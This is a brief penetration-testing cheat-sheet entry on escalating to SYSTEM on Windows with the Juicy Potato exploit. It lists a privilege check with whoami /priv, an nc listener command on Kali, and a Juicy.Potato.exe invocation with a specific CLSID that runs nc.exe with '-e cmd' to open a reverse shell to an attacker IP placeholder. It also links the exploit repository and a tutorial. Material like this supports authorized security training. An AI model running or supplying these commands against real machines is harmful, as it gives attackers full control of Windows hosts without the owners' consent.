- If you see this permission, it pretty much makes every version of Windows vulnerable to a Juicy Potato Exploit
whoami /priv:
This exploit requires the usage of Class Identifiers (CLSIDs)
{% embed url="http://ohpe.it/juicy-potato/CLSID/" %}
Once you Identify a proper CLSID, run the following:
- Start NC listener on Kali
nc -lnvp 1337
2. Execute juicy potato exploit with working CLSID
Juicy.Potato.x86.exe -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -t * -l 1337 -p "C:\path\to\nc.exe" -a "<kali_ip_here 1337 -e cmd"
Repo
{% embed url="https://github.com/ohpe/juicy-potato/releases" %}
Tutorial
{% embed url="https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505" %}